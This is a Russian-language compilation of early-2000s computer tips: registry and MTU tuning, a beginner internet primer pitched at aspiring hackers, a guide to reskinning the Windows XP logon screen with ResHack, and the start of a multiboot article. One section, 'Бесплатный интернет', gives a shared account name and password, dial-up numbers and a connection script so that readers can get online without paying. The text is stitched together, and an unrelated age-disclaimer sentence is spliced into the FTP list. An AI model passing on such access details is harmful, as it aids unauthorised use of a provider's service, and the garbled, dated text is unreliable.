А вот так вы увеличите количество одновременных подключений к серверу, что часто бывает весьма полезно:

[HKEY_USERS\.DEFAULT\Software\Microsoft\
Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server"=dword:0000000a =10
"MaxConnectionsPerServer"=dword:00000008 =8

Процедура оптимизации Интернет-соединения - дело весьма хлопотное и неоднозначное. Несмотря на то, что программ, предназначенных якобы для двукратного улучшения связи одним кликом мыши, - пруд пруди. И тут, как мы выяснили, совсем не факт, что MTU=576, которое везде рекомендуется западными программистами и экспертами, будет оптимальным и для нас в России. Наши провайдеры сплошь и рядом выбирают для себя MTU=1500, а при "пинговании" удаленных серверов мы обнаруживаем, что пакет такого размера, вопреки всем утверждениям, проходит чаще всего нефрагментированным. При этом, как видно из наших вычислений, чем больше MTU, тем эффективнее используется ваш Интернет-доступ. Возможно, наши рассуждения несколько спорны и противоречат общепринятым догмам на этот счет, поэтому, для того чтобы настроить вашу систему на максимальную производительность, вам придется лично: во-первых, выяснить действительное значение MTU своего провайдера; во-вторых - выбрав это значение, убедиться, что пакеты такого размера при связи с чаще всего вами посещаемыми серверами не будут фрагментироваться; в-третьих - провести эксперименты с закачкой одного и того же файла при разных значениях MTU; и в-четвертых - проверить, как сказывается изменение MTU на сетевых играх, если вас они, конечно, интересуют. Исходя их итогов этих опытов и стоит решать, какой размер максимального неделимого пакета вам следует в результате выбрать. То, что везде рекомендуется, для вас может оказаться наихудшим вариантом. Аналогично наберитесь терпения и проверьте влияние и других параметров на быстродействие системы - я упомянул далеко не все, над чем можно поизвращаться. При этом можно даже проверять MTU провайдера регулярно - раз в месяц, в два - не изменилось ли оно, но это уже для маньяков, хоть и не представляет никакой сложности, как мы с вами убедились выше.

    Бесплатный интернет

 

  Если у вас не хватает  денег на неограниченное подключение к интернету, но вы хотите найти новых знакомых и приятно проводить время это как раз то что вам нужно. Еще раз повторю , что все абсолютно бесплатно. И так для подключения вам нужно узнать, есть ли у вас в городе телефон дозвона.
 
Инструкция

Пункты доступа на средней скорости 33600 с поддержкой V.90 без скриптов

Москва, Санкт-Петербург, Киев, Таллин, Рига

Пункты доступа на средней скорости 28800 на территории используется скрипт EQUANT.SCP

Москва, Санкт-Петербург, Екатеринбург, Петропавловск-Камчатский, Иркутск,Хабаровск, Владивосток, Краснодар, Новосибирск, Воронеж, Нижний Новгород, Самара, Южно-Сахалинск, Ростов-на-Дону, Тюмень, Ереван, Баку, Минск, Алматы, Бишкек, Рига, Вильнюс, Кануас, Кишинев, Днепропетровск, Донецк, Киев, Львов, Одесса, Таллин

Внимание
!!! Настройка свойств сети требуется только в том случае, если Вы каким-то образом нарушили ее после установки Windows или каких-либо компонентов. По умолчанию свойства сети, не требуют вмешательства - там все установлено так, как необходимо для нормальной работы с Internet. Однако, если Вы ранее изменили настройки сети в процессе работы с Windows или в том случае, если у Вас отсутствуют необходимые компоненты, советуем Вам ознакомиться с инструкцией.
 
Инструкция.

1 Ручная Настройка свойств сети

1.1
Откройте окно "Панель управления".
Для этого дважды кликните на значке "Мой компьютер" и запустите "Панель управления",
дважды щелкнув по соответствующему значку мышкой. В "Панели управления" запустите "Сеть".

1.2
В разделе установленных компонентов убедитесь в наличии компонента TCP/IP.
Если этот компонент уже есть в списке, то сразу переходите к пункту 1.5

1.3
Если отсутствует компонент TCP/IP, то нажмите кнопку
"Добавить" под окном установленных компонентов.
В появившемся окне надо отметить тип компонента
"Протокол" и нажать кнопку "Добавить".

1.4
В окне "Изготовители" надо выбрать "Microsoft",
а в окне "Сетевые протоколы" - TCP/IP.
Закройте окно, нажав кнопку "OK".
Вернитесь в окно "Сеть".

1.5
Убедитесь что установка завершена.
Закройте окно настроек, нажав кнопку "OK".
Настройка свойств сети завершена

Возможны незначительные отличия из-за различия версий Windows или компонента TCP/IP,
а также из-за индивидуальных особенностей настройки компьютера.
Вообще, очень рекомендуем оставить все настройки так,
как они были установлены при инсталляции Windows или протокола TCP/IP.
Старайтесь их не трогать без необходимости.
 
 2. Создание нового соединения

2.1.
Откройте окно "Удаленный доступ к сети".
Для этого дважды щелкните на значке "Мой компьютер"
Запустите в открывшемся окне "Удаленный доступ к сети" (Dial-Up Networking).

2.2.
Дважды щелкните по значку "Новое соединение".
Появится диалоговое окно, в котором нужно ввести название соединения,
апример Internet. Нажмите кнопку "Далее" .

2.3.
В поле "номер телефона" введите один из модемных телефонов например,
967-6767 Затем нажмите кнопку "Далее".

2.4.
В окне "Удаленный доступ к сети" у Вас появился новый значок "Internet".
Теперь надо осуществить настройку параметров только что созданного нового соединения.

3. Настройка параметров соединения

3.1.
Нажмите один раз на появившуюся иконку "Internet",
чтобы она стала выделенной. Щелкнув на ней правой кнопкой мыши,
вызовите пункт "Свойства" соединения.
Это же самое можно сделать выбрав в меню "Файл" пункт "Свойства"

3.3. Выберите закладку "Тип сервера".
Погасите там все галочки дополнительных параметров и допустимых протоколов,
кроме той, что стоит напротив пункта "TCP/IP"

3.4.
Нажав на кнопку "Настройка TCP/IP" перейдите в окно настройки протокола.
Теперь нужно заполнит поля DNS серверов. Сделайте пометку напротив пункта
"Адреса вводятся вручную". Введите IP адреса DNS серверов.
DNS сервера: 57.0.2.2
                   57.0.3.2

3.5 Выберите закладку "Сценарии" или "Макросы подключения", в разных версиях WINDOWS по разному. Укажите путь к скрипту и нажмите "OK"

3.6.
акройте окно настройки свойств соединения, нажав кнопку "OK".
На этом настройка соединения завершена.
 
 Пункты доступа на скорости 33600 с поддержкой V.90 территории России и СНГ

Для ниже перечисленных городов используются следующие настройки:

Имя пользователя: icw5@gn.microsoft.com
               Пароль: icw5

         DNS сервера: 57.0.2.2
                             57.0.3.2

Телефон Тех. Поддержки: +7 (095) 956-2455

Россия

                                   Москва: 737-6027 (V.90/ISDN)

                   Санкт Петербург:    327-0298 (V.90/ISDN)

                               Таллин:    666-4690 (V.90/ISDN)


Латвия
                                       Рига: 703-2811 (V.90/ISDN)

Украина
                                         Киев: 230-3885 (V.90/ISDN)

Основные Пункты доступа на средней скорости 28800 на территории России и СНГ
Для
ниже перечисленных городов используйте этот скрипт EQUANT.SCP

Имя пользователя:
icw5@gn.microsoft.com
               Пароль: icw5

         DNS сервера: 57.0.2.2
                             57.0.3.2
 

Телефон Тех. Поддержки: +7 (095) 956-2455

Россия

                                     Москва: 967-6767 (28800)
                                                     967-6759 (28800)
                                                     956-4684 (28800)
                                                     258-6790 (28800)
                                                     232-5882 (28880)

                   Санкт - Петербург: 329-1199 (28800)

                           Екатеринбург: 59-29-94 (28800)

 Петропавловск - Камчатский: 11-06-00 (9600)

                                     Иркутск: 25-80-69 (9600)

                                 Хабаровск: 78-35-23 (28800)

                             Владивосток: 30-00-90 (28800)

                                 Краснодар: 64-00-84 (9600)

                             Новосибирск
: 11-90-88 (28800)

                                   Воронеж: 72-70-91 (9600)

                   Нижний Новгород: 31-70-20(9600)

                                       Самара: 70-21-05 (9600)

                   Южно - Сахалинск: 42-03-34 (9600)

                         Ростов на Дону: 65-72-93(28800)

                                     Тюмень: 49-65-06 (9600)

Армения

                                       Ереван: 06-146 (9600)

Азербайджан

                                           Баку: 97-23-70 (28800)

Беларусь

                                         Минск: 206-5620 (28800)

Грузия

                                       Тбилиси: 77-66-53 (28800)

Казахстан

                                       Алматы: 50-71-79 (28800)

Киргизия

                                       Бишкек: 54-21-14 (9600)

Латвия

                                             Рига: 724-2457 (28800)

 Литва

                                       Вильнус: 73-41-15 (28800)

                                         Каунас: 31-13-40 (9600)

Молдова


                                     Кишинев: 52-99-90 (28800)

Украина

                         Днепропетровск: 34-13-64 (9600)

                                       Донецк: 334-2126 (9600)

                                           Киев: 235-6723 (28800)

                                         Львов: 95-28-28 (9600)

                                       Одесса: 731-0421  (9600)

Эстония

                                         Таллин: 641-0730 (28800)
 
Если у вас возникли проблемы с подключением, проверьте правильно вы все сделали как было написано выше. Если все же есть вопросы и вам не удалось подключиться , то вы можете обращаться за помощью.

Бесплатный интернет с помощью программы DialJelly v.1.10 здесь

Из ламера в ….

Вступление.

Итак, однажды, взглянув на входящую почту нашего www.tehnofil.ru и посоветовавшись с коллегами, я понял одну истину: чтобы стать хотя бы высокообразованным пользователем, а не просто чайником, необходимо иметь, как бы выразиться, "необходимый минимум" знаний, без которых стать хакером или в крайнем случае опытным пользователем просто нельзя! В связи с этим решено написать цикл статей, которые в доступной фоме должны объяснить и рассказать вам данный минимум, который знает далеко не каждый. Зато, если будете знать вы - препятствий работы в сети, с хакерскими программами и проблем с защитой своего компьютера у вас не будет! Между прочим, аналогов данного цикла статей в сети нет, потому что все дают начальную пользовательскую информацию либо очень размыто, либо не уделяют внимания ей, поскольку считают её уже известной пользователю (кстати делают абсолютно правильно, однако раз решено написать статью, так решено). А уважаемые коллеги-хакеры тоже для развития и обновления своих знаний могут почитать статью - вещь крайне полезная!

1. Интернет и его свойства (уровень первый).

Интернет в современном виде появился в 1991 году, когда сформировалась современная система национальных доменов (см. дальше). Рассмотрим, что это такое и как работает. В сущности - Интернет - большая локальная сеть, т.е. какое-то количество компьютеров, соединённых между собой. Следовательно возникает необходимость обмена информацией между ними, иначе зачем их нужно было объединять? Как это сделать? Решение было найдено более 20 лет назад рабочей группой военного американского проекта ARPA, создавшей систему IP-адресов и концепцию ARPANET - родоначальника INTERNET. Эта концепция разрабатывалась для общения между военными компьютерами, даже в случае разрушения части сети связи или уничтожения части её компонентов (вот почему и сейчас довольно сложно что-либо "сломать" в сети). IP-адрес - четыре числа от 0 до 255, разделённые точками (к примеру: 158.206.36.107), обозначающими сетевой "адрес" компьютера (как номер дома - есть только один дом номер 1 и нет второго такого же - сеть не разрешит вход в неё машин с одинаковыми IP). К примеру, ваш компьютер имеет IP: 123.45.67.89. Чтобы получить мою статью, ваш компьютер обращается к сайту с этой статьей, размещенному на сервере, у которого IP 76.45.208.205, с запросом отправить необходимую вам информацию на ваш IP.

Сервер - основной элемент Интернет - постоянно (24 часа в сутки, 365 дней в году и т.д.) включённый и подключённый к Интернет компьютер, содержащий нужный вам сайт и ждущий команд удалённых пользователей, т.е. вашу команду. Запрашиваемый сайт её отправляет... В процессе передачи информации компьютеры обмениваются данными и подтверждениями об их правильной передаче, скорости связи и т.д. Вот уже получилась сеть из компьютеров, не зависящая от скорости связи ее отдельных составляющих или от их физического выхода из строя. Все компьютеры в Интернет соединены меду собой множеством независимых каналов связи, проходящих через разные узлы, страны, континенты.

Пока компьютеров в сети было не слишком много, можно было обходится просто несколькими, хоть и громоздкими, но привычными цифровыми IP. Поскольку количество серверов постоянно растёт, естественно увеличивается и количество их IP-адресов. Не каждый человек может запомнить с 10 - 100 IP-адресов с огромным количетвом символов. Для удобства пользователей и сокращения времени получения информации решили, что каждый компьютер может иметь личное имя, к примеру - tehnofil, которое могло бы соответствовать определённому IP-адресу. Но и это не решило проблему - такое решение стало не эффективным в современном Интернет, ведь вашему компьютеру пришлось бы сейчас опросить "всего" 10 000 000 - 100 000 000 машин и узнать имя каждой + некоторые из них могут быть одинаковыми. Следовательно и отклик пришлось бы ждать слишком долго.

Решение снова нашлось - создали "национальные домены" - RU, COM, NET и т.д. Национальный домен грубо говоря - своеобразный "адресный стол" - организация (т.е. несколько компьютеров), которая за отдельную плату регистрирует у себя поддомен, к примеру tehnofil.ru. Почему поддомен - если вы домен, кто тот, кто "ходит под вами" :-)? Теперь вам не нужно запоминать длинный числовой адрес, ибо строка: tehnofil.ru, условно говоря, передаст домену RU просьбу указать IP компьютера tehnofil. Заодно и решили проблему с дублированием имён компьютеров, т.к. такое имя может быть только одно. Хотя хакеры начнут сразу ругаться, что что-то я опустил, но это мелочи, на которые отвлекаться вам пока рано.

Так, хорошо, а как узнать IP национального домена? Просто! Как вы выходите в сеть? Через модем или с помощью выделенной линии, верно? Та организация, к которой вас подключает ваш канал связи, называется провайдером, т.е. вы платите не владельцам сайтов, за то, что заходите к ним на сайты, а провайдеру за то, что он арендует помещения, компьютеры, канал связи, через который он подключен к пространству интернет, точнее к одному из многих миллионов его каналов связи. Вот этот самый провайдер, помимо остального предоставляет вам сервера DNS (с понятиями серверов мы разберёмся позже), т.е. подключившись к компьютеру провайдера, ваша машина запрашивает у его DNS (домен найм сервер, что и ихнего переводится как вроде как хозяин имён серверов) все данные, необходимые для работы с интернет. Значит набирая в браузере tehnofil.ru вы запрашиваете информацию об IP не у национального домена, а у днс сервера провайдера, который узнаёт эту информацию уже у национально домена и дублирует её внутри себя, чтобы лишний раз не запрашивать на будущее национального домена. Вот и всё! Таковы основные принципы работы современного интернет. Да простят меня хакеры, за столь подробный рассказ и за некоторые неточности - надо постепенно погружать пользователя в сетевые технологии.

Итак, систему имён и адресов построили, что дальше? Надо разработать специальные программы, которые давали бы возможность удаленным пользователям беспрепятственно (или наоборот) получать информацию с вашего компьютера, не разрешая в общем случае лазать по вашему компьютеру. Для этих целей был создан HTTP протокол связи. Т.е. он предусматривает в общем случае возможность передавать на запрос удаленного компьютера какую-либо информацию, однако это загрузка информации на удалённую машину по нему возможна в случае передачи её специальной программе - скрипту, который выполнит с ней соответствующие действия.

Вкратце о протоколе HTTP.

Итак, ваш компьютер обратился к сайту tehnofil.ru по протоколу HTTP, для этого вы могли написать tehnofil.ru или http://tehnofil.ru/, в любом случае ваш браузер - программа, которая получает информацию от tehnofil.ru, по умолчанию установит связь именно по этому протоколу, т.к. он является ключевым в интернет (обозначение протокола - http:// перед адресом). Tehnofil.ru, получив запрос от вашей машине в зависимости от настроек отправит вашему браузеру ГИППЕРТЕКСТОВЫЙ документ, имеющий обычно название index.html (index.htm). Гиппертекстовый документ - обычный текст, написанный, к примеру, в обычном текстовом редакторе, снабженный специальными машинными кодами, которые изменяют цвет, размер текста, цвет и рисунок фона и т.д. Ваш браузер представит в зависимости от его представлений о данных кодах эту самую страницу вашему взгляду. Особенностью протокола HTTP является то, что если сайт не отправит вам первую страницу сайта (гиппертекстовый документ) или в её теле (на ней) нет ссылок на другие файлы, которые, предположим, тоже находятся на удалённом сервере вы ни какими методами, кроме перебора возможных названий документов и т.д. не сможете узнать их имена. Иными словами данный протокол связи не предусматривает возможности показывать внутреннюю структуру самого сайта, одновременно показывая сообщение об ошибке, если запрашиваемый документ не найден. Это конечно рано вам пока знать, однако в контексте возникших вопросов не могу не заметить. Дело в том, что существуют специальные программы, написанные в программном (т.е. содержащем какие-либо команды) текстовом коде, которые способны по записанным в них командам изменять текст, вставлять картинки и т.д. в страницы, отправляемые пользователю, а также изменять содержимое этих страниц в зависимости от времени, введённой пользователем информации в какую либо форму и т.д. Если кто-то из читателей данной сатьи сидит в танке - посню: скрипт отправит вам результат своих действий (картинку, документ и т.д.), а себя. Эти программы (скрипты) способны и загружать файлы с компьютера пользователя, правда только с его разрешения и если это предусмотрено их кодом. Независимо от типа скрипта и его языка написания (php, perl ...) вам в любом случае отправится обычный гиппертекстовый документ (или картинка) вне зависимости от того, создал его человек или только что специально для вас удалённые сервер.

Что такое электронная почта и как она работает?

На заре интернет, когда уже была создана система доменных имён (на самом деле электронная почта появилась как только 2 компьютера были соединены в сеть на заре сетей как таковых, в Америке, и первое сообщение состояло только из заглавных букв, обозначающих имя его изобретателя), возникла необходимость обмениваться тестовой информацией, а поскольку это можно было делать крайне быстро, развитие электронной почты пошло крайне бурно. Сейчас электронная почта работает в общем виде так: написав письмо, вы отправляете его тому почтовому серверу, на котором у вас расположен почтовый ящик, в случае tehnofil.ru это - mail.tehnofil.ru. Почтовый сервер отличается от вашего компьютера, как мы уже говорили, тем, что подключен к сети постоянно и в случае если по каким-либо причинам удалённый почтовый сервер (тот, на котором расположен почтовый ящик того, кому вы писали) в данный момент не доступен, письмо будет доставлено тогда, как только удалённый сервер снова подключится или в общем случае сразу - если соединение завершилось успешно и письмо принял удалённый сервер. Вот так-то. А если вам ответили, а ваш компьютер выключен и не подключён к интернет? Всё будет хорошо, пользователь отправит текст письма своему почтовому серверу, а тот доставит его вашему. Ваш же сервер будет его сохранять до тех пор, пока вы не заберёте почту... Иными словами у вас есть почтовый адрес user@tehnofil.ru, вы написали письмо на vasya@mail.ru. Это значит, что вы отправили текст письма почтовому серверу tehnofil.ru, тот в свою очередь свяжется с почтовым сервером mail.ru и передаст сообщение для пользователя vasya. Пользователь Vasya, ответив, передаст текст письма почтовому серверу mail.ru, сервер установит связь с почтовым сервером tehnofil.ru и передаст текст письма для пользователя user. Вот и всё. Надеюсь не нужно объяснять, как зарегистрировать почтовый ящик?

Уровень второй: расширяем свои возможности?

Итак, почту, как правило, можно читать как в веб-интерфейсе, т.е. скрипты на почтовом сайте будут создавать вашему браузеру, страницы, с помощью которых производится чтение/написание и т.д. писем.


А можно по-другому?

Можно! Дело в том, что почта, как таковая это не веб интерфейс, а работа 2 почтовых протоколов свзи: pop3 и smtp. Протокол imap - редко используемый аналог pop3. Для чего они нужны? В случае, если у вашего почтового сервера отсутствует веб-интерфейс или вам просто лень ходить в него, если вам нужно читать/отправлять много почты - это для вас. Дело в том, что забирать почту с почтового сервера можно специальных почтовых программ (Оатлок экспресс, Бат и др.), они забирают и отправляют почту с вашего и на ваш почтовый сервер самостоятельно, не привлекая веб-интерфейс.

Подробнее о pop3 smtp протоколах можно почитать тут: http://tehnofil.ru/?id=34.

Что такое порты?

А как вы думаете, логично было бы в друшлаке делать только одно отверстие? Нет, конечно! Помните я говорил, о различных протоколах связи. Почему различных? Потому, что они используют различные команды связи, обмена данными. Тут-то наша арпа постаралась: дело в том, что один IP адрес может открыть до 65536 потов. Зачем? Для различных протоколов связи, конечно! Из известных вам на данный момент: HTTP - 80, pop3 - 110, smtp - 25, imap - 143. Старые добрые программы - нюкеры, способны подать некорректный запрос на один из них и повесить сервер, однако все современные машины давно защищены от подобного рода программ.

Какие ещё есть протоколы связи?

Пожалуй из часто встречающихся - не больше 10.

·  FTP протокол связи. Порт протокола - 21. В зависимости от прав, предоставленных вам администратором сервера вы можете: материалы, которые я просматриваю, предназначены только для моего личного использования, и я не буду демонстрировать их лицам, не достигшим 21 года;

  1. Ничего.
  2. Скачивать файлы.
  3. Скачивать и загружать файлы.
  4. Загружать файлы, удалять файлы и т.д.

Главным отличием от HTTP протокола является то, что вы видите содержимое папки, к которой вы работаете, как будто перед вами обычных диск... протокол обозначается ftp://, т.е. набрав адрес ftp://masterhost.ru, к примеру, ваш браузер свяжется по 21 ftp протоколом связи. Однако, не зная логина и пароля вы не войдёте на фтп сервер. Некоторые фтп сервера просто открыты для всех пользователей, некоторые - нет.

Ну и ещё несколько: telnet - 23, FINGER - 79, UDP - 53. Про алгоритмы анализа удалённой системы и протоколы связи можно почитать тут: http://tehnofil.ru/?id=47.

Вернёмся к поддоменам.

Что по вашему значит http://www.tehnofil.ru? Рассмотрим алгоритм поиска данного сайта (т.е. под сайтом подразумевается как правило только веб-содержимое, а под понятием сервер - все службы - pop3, smtp, http, ftp + исполняемые скрипты). Обращение сначала, условно говоря, пойдёт к домену RU, тот отправит нас на IP нашего tehnofil.ru, а tehnofil.ru - отправит нас по IP нашего поддомена www.tehnofil.ru. Механизм подобного запроса, порты, которые используются для него и другие технические подробности оставим пока до следующей статьи. Кстати довольно часты случаи, когда домен и его поддомены имеют одинаковый IP и их обслуживает один и тот же сервер. Ибо мы передаём имя требуемого нами ресурса определённому IP, а тот может либо, если таковой сайт на нём зарегистрирован, отправить нам его стартовую страницу, либо отбросить сообщение об ошибке, если данное имя он не обслуживает. Количество поддоменов может быть неограниченным. Но следует иметь ввиду, что поддомен www.user.com и user.com, к примеру обычно показывают одно и тоже содержимое. Однако эти параметры, конечно могут меняться... Кстати адрес сайта user.chat.ru (www.user.chat.ru) и www.chat.ru - поддомены одного и того же chat.ru, просто настроенные по-разному.

И на последок - алиас (т.е. когда одно и тоже содержимое одного и того же сервера видны по разным адресам) www был придуман в том - же знаменательном 1991 г., и переводится с английского как единая всемирная паутина (сеть).

Цикл данных статей планируется продолжить. Если хотите, чтобы это произошло скорее - пишите на tehnofil@tehnofil.ru и предлагайте свои вопросы.

P.S.

Если вы прочли эту статью внимательно, вы сможете утереть нос многим "хакерам", которые кричат об этом направо и налево (т.е. обычным ламерам) + вряд ли у вас теперь могут возникнуть вопросы по общим принципам работы в сети...

 

 

 

Оформляем Windows XP - вход в систему по-нашему

Вступление

Windows XP входит в нашу жизнь, не смотря на все наше сопротивление. Только-только привыкли к ставшей более-менее стабильной Win2000, как на тебе - WinXP поражает своей красотой (и немерянными системными требованиями). Ну что ж делать. Приходится осваивать. А раз уж есть возможность сделать свою операционную систему красивее чем есть или просто не похожей на другие, то почему бы этого не сделать? В частности сегодня попробуем поговорить о том, как создать собственный экран входа в систему (Logon User Interface).

Сразу прошу запомнить, что я не собираюсь отвечать на дальнейшие вопросы по этой теме. Воспринимайте написанное как есть. Это не учебник и не руководство к действиям, а лишь попытка поделиться личным опытом. Спасибо. И еще одну вещь хочу заметить: в этой статье затрагиваются элементы работы с графическими изображениями. Заметьте, что я привык использовать Photoshop и любые ссылка на графическое ПО приводятся в терминах Photoshop. Хотя вы можете использовать те программы с которыми больше привыкли работать. Я был обязан все это сказать. А теперь, давайте приступим.

Требования

Перед тем, как начать что-либо создавать необходимо подобрать инструменты для работы. В нашем случае вам прежде всего понадобится компилятор/декомпилятор ресурсов, называемый ResHack.

Для тех, кто уже успел испугаться названия, скажу, что программа эта крайне проста в использовании и специальных навыков абсолютно не требует. Текущую версию ResHack вы всегда можете скачать тут. После того, как вы ее установили, вам надо выбрать редактор графических изображений. Вы ведь все же создаете графический интерфейс, не так ли? Надеюсь, что-то в этом роде у вас уже есть. В самом крайнем случае вы можете использовать и MS Paint… Но я этого вам не говорил :-). Было бы неплохо. Если у вас на компьютере нашлось что-то вроде Paint Shop Pro или Adobe Photoshop. Ну и наконец, вам совсем неплохо бы иметь программу XPLogon UI,

которая позволяет переключать UI без всяких проблем. Если вы все. Что нужно скачали и установили, то мы можем переходить непосредственно к созданию нового интерфейса.

Концепция

Перед тем как начать работу, наверняка стоит немного времени потратить на размышления. Хуже от этого не станет совершенно точно. Я не собираюсь сейчас вдаваться в теорию цветов, но постарайтесь все же держать в голове простую мысль, что вы создаете интерфейс, а не свершенное по красоте художественное полотно, где найдется место 4 миллионам цветов. Будьте проще, и пользователи к вам потянутся :-). А дальше, хозяин - барин, творите, кто во что горазд.

Графикак

Прежде всего вам должно бы захотеть создать отдельную папку для хранения всего, что вы сейчас будете создавать. Открываем наш графический редактор. Прямо сейчас начинаем создавать одну картинку - фон (самая простая часть). Убедитесь, что начальный размер создаваемого вами изображения соответствует разрешению на вашем мониторе - другими словами, если у вас установлено разрешение 1280 x 1024, то сделайте картинку размером 1280 x 1024. Теперь просто делайте фон таким, каким вам хотелось бы его видеть. Определите места, где должны располагаться кнопки и иконки входа в систему. Пока рисовать их не надо, это будет сделано позже.

После того, как с изображением фона закончено, сохраните его в родном для вашего редактора формате - для пользователей Photoshop это будет PSD-файл. Теперь вам надо отредактировать/создать ряд других изображений для того, чтобы экран входа в систему функционировал как должно. Но где взять шаблоны для этих изображений? Внутри файла logonui.exe, конечно! Если только мы сможем эти изображения из него вытащить …

ResHack, часть I

Теперь настало время узнать немного про ResHack. Но перво-наперво найдите, где на вашем компьютере находится то, что вы собираетесь менять. Найдите файл logonui.exe (обычно он находится в C:\WINNT\Resources), и скопируйте его в папку, где вы собираетесь держать все, относящее ся к новому проекту. Теперь запускайте ResHack. Находясь в программе открывайте меню File > Open и выбирайте копию файла logonui.exe, которую вы сделали. Открыв его, вы увидите дерево папок ресурсов слева и пустое поле справа.

Дерево содержит папки UIFILE, Bitmap, String Table и Version Info. Держать все это в голове совершенно ни к чему. Прямо сейчас нас интересуют только графические изображения… и найти их мы сможем в папке Bitmap, как уже могли предположить те, кто знает английский.

Раскрывая папку Bitmap, вы обнаружите ряд вложенных в нее папок, пронумерованных от 100 до 127. Каждая такая папка содержит одно изображение, относящееся к графическому интерфейсу экрана входа в систему. Многие из этих папок содержат картиночки, являющиеся самыми незначительными деталям интерфейса, но так как я человек добрый, можно даже сказать, щедрый, то расскажу обо всех, о каких только знаю, прямо сейчас:

100 - фоновая картинка

102 - поле ввода пароля

103 - кнопка со стрелкой

104 - активная кнопка со стрелкой

105 - кнопка помощи

106 - активная кнопка помощи

107 - кнопка питания

108 - стрелка вверх

109 - стрелка прокрутки вниз

110 - стрелка прокрутки вверх

111 - полоса прокрутки

112 - поле выбранного пользователя

113 - квадрат иконки

114 - иконка по-умолчанию

119 - активный квадрат иконки

121 - активная кнопка питания

122 - активная стрелка вверх

123 - ?

124 - вертикальная линия

125 - линия по верху экрана

126 - линия по низу экрана

127 - ?

Вот так… давайте сделаем что-нибудь прямо сейчас. Кликните на папку 112; затем в меню выберите "Action" - "Save [Bitmap : 112]". Появится окно, где вам будет предложено сохранить выбранное изображение в формате BMP. Сохраните его как "112.bmp" в вашей рабочей папке и переключайтесь в Photoshop. Открывайте "112.bmp", рассмотрите его, внесите какие хотите изменения (если с фантазией туговато, измените хотя бы цвет), затем сохраните. Переключитесь обратно в ResHack и пвторите эту процедуру со всеми изображениями, которые вы хотите изменить. Главное не перепутайте номера, что бы потом можно было без проблем поставить переделанные вами картинки на их родные места. Затем вы выбираете в меню "Action" - "Replace Bitmap…" вот в таком окне:

получаете возможность заменить любое изображение внутри logonui.exe на то, которое вы отредактировали.

ResHack, Часть II

А теперь мы перейдем к достаточно сложной части, чем-то похожей на программирование. Но не пугайтесь, это только на первый взгляд все выглядит запутанно и непонятно. Я уверяю вас, что вы справитесь, может даже лучше, чем я сам. Итак, опять смотрим ResHack и открываем папку в logonui.exe названную "UIFILE". В ней находим папку "1000", а в ней ресурс названный "1033".

На первый взгляд кажется, что он пустой, но если прокрутить его примерно на 1/2 вниз, то вы увидите начало некоего кода - этот код и управляет экраном входа в систему. Каждый тег "style" описывает объект дизайна, какого цвета тот должен быть и где располагаться. В начале каждого тега присутствует код "resid=", и то, что следует за знаком равенства описывает определяемый объект. Первый объект "frames" - это основной фон. Если вы внимательно будете смотреть на последующий код, то увидите, что в этом теге дальше определяется кнопка (button), изображение которой читается из ресурса 112 (rcbmp(112,…). После фона идут теги "style" toppanelss и bottompanelss, представляющие две границы экрана - верхнюю и нижнюю. Любой тег "style", который содержит строку "rgb(X,X,X)" позволяет вам менять цвет определяемого элемента. Цвет в данном случае пишется в RGB. Главное не забывайте, что пробелы после запятых между значениями должны отсутствовать - "rgb(255,216,0)". Если вы затрудняетесь в определении значений RGB для нужного вам цвета, используйте палитру Photoshop. Ниже по тексту вы найдете описания многих элементов. Описывать все их в данной статье я смысла не вижу. Надеюсь, сами разберетесь, там ничего особо сложного нет.

Мы все время говорили о цвете. Но ведь вы можете менять и шрифты, которыми выводятся надписи, и, что еще важнее, расположение и размеры полей с именем пользователя и ввода пароля. Это в гораздо большей степени позволяет менять интерфейс, но и навыков дизайнера для этого иметь надо больше, так как по числовым значениям координат представить себе четко расположение того или иного элемента на экране не так то просто. В общем я вам сказал о такой возможности, а вы уж сами сам с усами.

Поменяв все, что нужно нажмите на кнопку "Compile Script" вверху правой части окна программы, и все ваши изменения будут сохранены.

Пока мы все еще в программе редактирования ресурсов, давайте посмотрим, что еще можно просто и быстро переделать, не прилагая особых усилий. Взглянув на дерево ресурсов слева в окне ResHack, видим папку String Table. В ней папки 1, 2, 3, 4 и 7 содержат все текстовые сообщения, какие только могут появиться на экране входа в систему WinXP - от приветствий до сообщений об ошибках. Отличный повод сделать небольшую русификацию своей системы - будет чем похвастать перед друзьями "Русская XP еще вышла, но у меня уже есть :-)". Короче, проявите свою фантазию.

Пользуем

Ну вот, все самое страшное позади. Теперь осталось лишь сохранить ваш модифицированный logonui.exe. После чего откройте XPLogon UI, выберите созданный вами вариант и скажите использовать его.

Команда завершения сеанса текущего пользователя позволит вам немедленно начать любоваться своим творением.

Вперед, XP зовет!

 

Многовариантная загрузка с XP Professional

Как известно, Microsoft наконец окрестила преемника Windows 2000. В результате слияния Windows NT и Windows 9x на свет появилась долгожданная операционная система для настольных компьютеров Windows XP (ранее она называлась Whistler). Система существует в двух вариантах: XP Professional и XP Home Edition (следующие версии серверных продуктов семейства Windows 2000 будут именоваться Windows 2002). Чтобы в полной мере оценить XP Professional, можно сконфигурировать существующую систему Windows 2000 Professional как систему с многовариантной загрузкой. Для этого требуется некоторый предварительный анализ и подготовка.

Освежить знания об основных принципах и процедурах построения многовариантных систем на базе Windows 2000 и NT поможет приведенный во врезке список статей, опубликованных в предыдущих выпусках журнала.

Подготовка к мультизагрузке

Прежде чем погрузиться в процесс конфигурирования системы с мультизагрузкой XP Professional и Windows 2000 Professional, следует продумать ряд вопросов. Первый вопрос касается целесообразности использования динамических дисков. Windows 2000 обеспечивает поддержку новой структуры дисков (динамические диски), которая заменила используемую в NT структуру, унаследованную из MS-DOS. (О динамических дисках рассказывается в статье того же автора «Что собой представляют динамические диски», опубликованной в №4 Windows 2000 Magazine/RE за 2000 г. — прим. ред.) Динамические диски обладают рядом преимуществ по сравнению с обычными. Они позволяют осуществлять управление в оперативном режиме, реконфигурацию дисков и дублирование структур данных на нескольких дисках. Однако при использовании динамических дисков невозможно организовать мультизагрузку операционных систем, отличных от Windows XP и Windows 2000. Другие операционные системы (Windows Me, Windows 9x, Linux, DOS) не могут использовать размещенные на динамических дисках тома, которые являются эквивалентом разделов на обычных дисках.

